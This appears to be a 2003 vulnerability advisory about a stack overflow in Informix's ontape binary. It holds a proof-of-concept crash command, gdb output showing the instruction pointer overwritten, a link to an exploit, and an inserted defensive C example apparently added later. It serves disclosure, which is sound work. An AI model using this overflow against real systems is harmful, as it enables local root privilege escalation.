Message-ID: <Pine.LNX.4.44.0401270957190.5359-100000@hades2.concha.upv.es>
From: pask at open3s.com (pask@...n3s.com)
Subject: OPEN3S-2003-08-08-eng-informix-ontape
----------========== OPEN3S-2003-08-08-eng-informix-ontape ==========----------
Title: Local Vulnerability at Informix IDSv9.40 via ontape binary
Date: 08-08-2003
Platform: Only tested on Linux, but the issue can be ported to other platforms.
Impact: Any user with DSA privileges over Informix could achieve root
privileges through a stack buffer overflow in ontape binary
Author: Juan Manuel Pascual Escriba pask@...n3s.com
Status: Solved by IBM Corp.
PROBLEM SUMMARY:
A stack buffer overflow occurs while the ONCONFIG environment variable is
read, when its value is larger than 495 bytes.
[informix@...oni bin]$ export ONCONFIG=`perl -e 'print "A"x495'`
[informix@...oni bin]$ ./ontape
WARNING: Cannot access configuration file $INFORMIXDIR/etc/$ONCONFIG.
Segmentation fault
[pask@...oniet bin]$ gdb ./ontape
(gdb) r
WARNING: Cannot access configuration file $INFORMIXDIR/etc/$ONCONFIG.
Segmentation fault
(gdb) info reg
eax 0xffffffff -1
ecx 0x40083580 1074279808
edx 0x46 70
ebx 0x1 1
esp 0xbfff74a0 0xbfff74a0
ebp 0x41414141 0x41414141
esi 0xbfff74cc -1073777460
edi 0x0 0
eip 0x41414141 0x41414141
It's possible to achieve root privileges through this buffer overflow.
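The defensive pattern the advisory implies, as an added example that is not Informix code: the length of an environment value is checked before anything is copied, so an oversized ONCONFIG can only be rejected. The 494-byte name limit (the advisory's 495-byte value crashes), the $INFORMIXDIR/etc/<name> layout and the extra path-separator check are assumptions of this example.

```c
#include <stddef.h>
#include <string.h>

/* Assumed limit: the advisory shows a 495-byte value crashing ontape, so
 * names of 495 bytes or more are rejected; the real buffer size is unknown. */
#define ONCONFIG_NAME_MAX 494

enum onconfig_status {
    ONCONFIG_OK = 0,
    ONCONFIG_EMPTY,      /* variable unset or empty */
    ONCONFIG_TOO_LONG,   /* name or resulting path would not fit */
    ONCONFIG_BAD_CHAR    /* contains '/', assumed extra check for a setuid tool */
};

/* Validate an ONCONFIG value and, if acceptable, write
 * <informixdir>/etc/<onconfig> into out (outlen bytes).
 * Nothing is written until every length check has passed. */
enum onconfig_status build_onconfig_path(const char *informixdir,
                                         const char *onconfig,
                                         char *out, size_t outlen)
{
    size_t dirlen, namelen, need;

    if (onconfig == NULL || onconfig[0] == '\0')
        return ONCONFIG_EMPTY;

    /* Bound the scan itself: never walk more than ONCONFIG_NAME_MAX + 1 bytes. */
    namelen = strnlen(onconfig, ONCONFIG_NAME_MAX + 1);
    if (namelen > ONCONFIG_NAME_MAX)
        return ONCONFIG_TOO_LONG;

    if (strchr(onconfig, '/') != NULL)
        return ONCONFIG_BAD_CHAR;

    dirlen = strlen(informixdir);
    need = dirlen + 5 + namelen + 1;          /* "/etc/" plus terminating NUL */
    if (need > outlen)
        return ONCONFIG_TOO_LONG;

    memcpy(out, informixdir, dirlen);
    memcpy(out + dirlen, "/etc/", 5);
    memcpy(out + dirlen + 5, onconfig, namelen + 1);  /* copies the NUL too */
    return ONCONFIG_OK;
}
```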
IMPACT:
Any user with exec permission over ontape could achieve root
privileges. In my default installation only users with DSA privileges
can exec this binary.
SOLUTION:
See more information about this vulnerability and workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336
STATUS
Reported to IBM security team on 11th of August 2003
See more information about this vulnerability and workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336
This vulnerability was managed in an efficient manner by Jonathan Leffler
from IBM Informix Database Engineering Team.
EXPLOIT
http://www.open3s.com/exploits/OPEN3S-2003-08-08-eng-informix-ontape.c
--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba pask@...n3s.com
Barcelona - Spain http://www.open3s.com